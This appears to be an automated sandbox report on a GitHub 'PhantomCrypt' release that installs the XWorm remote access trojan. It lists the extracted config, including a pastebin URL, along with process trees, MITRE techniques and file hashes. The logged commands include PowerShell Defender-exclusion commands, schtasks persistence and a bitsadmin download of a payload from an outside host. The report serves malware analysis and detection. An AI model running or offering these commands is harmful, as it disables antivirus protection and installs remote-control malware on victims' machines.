Analysis
-
max time kernel
204s -
max time network
205s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
24-01-2025 13:14
General
-
Target
https://github.com/kavateforaro/PhantomCrypt
Malware Config
Extracted
xworm
5.0
fSptE7osVO19YSsZ
-
Install_directory
%AppData%
-
install_file
msedge.exe
-
pastebin_url
https://pastebin.com/raw/eZa6J63T
Signatures
-
Detect Xworm Payload 8 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Download via BitsAdmin 1 TTPs 3 IoCs
-
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 7 IoCs
-
Executes dropped EXE 22 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 4 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 60 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 34 IoCs
-
Suspicious use of FindShellTrayWindow 37 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/kavateforaro/PhantomCrypt1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0xd8,0x7ffa6d5146f8,0x7ffa6d514708,0x7ffa6d5147182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,17144887301639991450,13218329471434272180,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2304 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,17144887301639991450,13218329471434272180,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,17144887301639991450,13218329471434272180,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2888 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,17144887301639991450,13218329471434272180,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,17144887301639991450,13218329471434272180,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,17144887301639991450,13218329471434272180,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5548 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,17144887301639991450,13218329471434272180,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5548 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,17144887301639991450,13218329471434272180,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,17144887301639991450,13218329471434272180,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,17144887301639991450,13218329471434272180,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,17144887301639991450,13218329471434272180,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4124 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2232,17144887301639991450,13218329471434272180,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5348 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,17144887301639991450,13218329471434272180,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2232,17144887301639991450,13218329471434272180,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,17144887301639991450,13218329471434272180,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3204 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\PhantomCrypt-main\PhantomCrypt-main\release\" -an -ai#7zMap32300:178:7zEvent255251⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Downloads\PhantomCrypt-main\PhantomCrypt-main\release\PhantomCrypter\PhantomCrypter.exe"C:\Users\Admin\Downloads\PhantomCrypt-main\PhantomCrypt-main\release\PhantomCrypter\PhantomCrypter.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\Downloads\PhantomCrypt-main\PhantomCrypt-main\release\PhantomCrypter\msedge.exe"C:\Users\Admin\Downloads\PhantomCrypt-main\PhantomCrypt-main\release\PhantomCrypter\msedge.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\PhantomCrypt-main\PhantomCrypt-main\release\PhantomCrypter\msedge.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Roaming\msedge.exe"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Users\Admin\Downloads\PhantomCrypt-main\PhantomCrypt-main\release\PhantomCrypter\PhantomCrypters.exe"C:\Users\Admin\Downloads\PhantomCrypt-main\PhantomCrypt-main\release\PhantomCrypter\PhantomCrypters.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Chrome Update.exe"C:\Users\Admin\AppData\Roaming\Chrome Update.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome Update" /tr "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://spyderrock.com/xkdg5397-run.exe C:\Users\Admin\AppData\Local\Temp\Notify.exe4⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Roaming\msedge.exe"C:\Users\Admin\AppData\Roaming\msedge.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Users\Admin\AppData\Roaming\TOPHERC.exe"C:\Users\Admin\AppData\Roaming\TOPHERC.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\5816ad0dc45c43e1ac6b51ad6951a3fb /t 4440 /p 2121⤵
-
C:\Users\Admin\Downloads\PhantomCrypt-main\PhantomCrypt-main\release\PhantomCrypter\PhantomCrypter.exe"C:\Users\Admin\Downloads\PhantomCrypt-main\PhantomCrypt-main\release\PhantomCrypter\PhantomCrypter.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\Downloads\PhantomCrypt-main\PhantomCrypt-main\release\PhantomCrypter\msedge.exe"C:\Users\Admin\Downloads\PhantomCrypt-main\PhantomCrypt-main\release\PhantomCrypter\msedge.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Downloads\PhantomCrypt-main\PhantomCrypt-main\release\PhantomCrypter\PhantomCrypters.exe"C:\Users\Admin\Downloads\PhantomCrypt-main\PhantomCrypt-main\release\PhantomCrypter\PhantomCrypters.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Chrome Update.exe"C:\Users\Admin\AppData\Roaming\Chrome Update.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://spyderrock.com/xkdg5397-run.exe C:\Users\Admin\AppData\Local\Temp\Notify.exe4⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Roaming\msedge.exe"C:\Users\Admin\AppData\Roaming\msedge.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\TOPHERC.exe"C:\Users\Admin\AppData\Roaming\TOPHERC.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\msedge.exeC:\Users\Admin\AppData\Local\msedge.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Chrome Update.exe"C:\Users\Admin\AppData\Roaming\Chrome Update.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\OneDrive.exeC:\ProgramData\OneDrive.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Downloads\PhantomCrypt-main\PhantomCrypt-main\release\PhantomCrypter\PhantomCrypters.exe"C:\Users\Admin\Downloads\PhantomCrypt-main\PhantomCrypt-main\release\PhantomCrypter\PhantomCrypters.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Chrome Update.exe"C:\Users\Admin\AppData\Roaming\Chrome Update.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://spyderrock.com/xkdg5397-run.exe C:\Users\Admin\AppData\Local\Temp\Notify.exe3⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Roaming\msedge.exe"C:\Users\Admin\AppData\Roaming\msedge.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\TOPHERC.exe"C:\Users\Admin\AppData\Roaming\TOPHERC.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
BITS Jobs
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
152B
MD5e55832d7cd7e868a2c087c4c73678018
SHA1ed7a2f6d6437e907218ffba9128802eaf414a0eb
SHA256a4d7777b980ec53de3a70aca8fb25b77e9b53187e7d2f0fa1a729ee9a35da574
SHA512897fdebf1a9269a1bf1e3a791f6ee9ab7c24c9d75eeff65ac9599764e1c8585784e1837ba5321d90af0b004af121b2206081a6fb1b1ad571a0051ee33d3f5c5f
-
Filesize
152B
MD5c2d9eeb3fdd75834f0ac3f9767de8d6f
SHA14d16a7e82190f8490a00008bd53d85fb92e379b0
SHA2561e5efb5f1d78a4cc269cb116307e9d767fc5ad8a18e6cf95c81c61d7b1da5c66
SHA512d92f995f9e096ecc0a7b8b4aca336aeef0e7b919fe7fe008169f0b87da84d018971ba5728141557d42a0fc562a25191bd85e0d7354c401b09e8b62cdc44b6dcd
-
Filesize
1KB
MD583c81f1ca94c76a7a07e244516665afc
SHA1bec5fdb5f667b324dcbc6c8f4ed0024c4c75946b
SHA25644cd7aa555bb053b73d435d3ca2e117065160ff66e83c1d3ad04d0300b6e576b
SHA51243016a23a10202bc7fd598e24652f3dfe1e42d3b914e03309c2f5858e6dd5403965bef04473d54ee79aa6e8bd0a0b7cf3b88dd87ebfa66ec489352f5702f9a0f
-
Filesize
657B
MD5cee71c2501fbf3f7c793fb1537f39362
SHA168449c1322a773b9be344f66bdc02cf6247d7df7
SHA2569829a6b4586d5689c023784f94fa6df2baf22c209d779b4866c50cbc288860fd
SHA512c932268f9a1eda03f7d62f9b36c1d716ad0984fde2176613d0b2124e76de6c1bac7152201068277ba64d42e707b061ef9bae5758c79defdf0438c41bf314df5d
-
Filesize
5KB
MD5016f4c90750f7fca44d7ba6c2df46a8f
SHA140245f613c4042544b75905dbcb88dbd7d13c57d
SHA2568bbf7188f68a7ff5236853b6c908ab9b318ab95d7624cf41ad12e813c97d678f
SHA512165cbf6dd4c3da95589a4487db93293047306bdca64b7f1daa8b4f5404bc39601b99f438d8f7a5c4d6477b7f4384ab7972e338b3c83b3e0ddfd2dbedc1c10d89
-
Filesize
6KB
MD59e1c5d881145ea65b7b665a21bfb551d
SHA1d0be5ce11b4960dc9eb8f6b6bdd1aa5e7c45b76d
SHA256087ea307a693880d93b3b22ee762833063a4e968545325a1e28f9a5446c2aa12
SHA512c38dcba8634353328c1c7c3a64fcd3c3ceaf9d2a317f04907d638b3c37ae90979f48f16cadd36e13e955c844b1a4481bd7fb3da67156963c24411dbb4b70b798
-
Filesize
6KB
MD5ae3994fc44568877655f42c92e312172
SHA1bd297fa657f019bda3d4db2976e74be701c18304
SHA256f119049df8772a191a7f45c7a62c286017aac659f8983ff7faabc99c9faffe81
SHA5127f651763ce923639b3897b9f465e0100ffaf835e420ead30218e6a59e48a6cbddfa3410d63bbb687835746b156f4702665aa438ab1cfcb227e0adb116ad0023f
-
Filesize
1KB
MD546639126c2b88aa25273f3e1f273cded
SHA11499a76e774205b774198d6320c9b5dc8c9ab6f6
SHA256777d61c5b2121d7234062dc3037d67af2d5f7dc296fe08497d6cc8a7ecf230ac
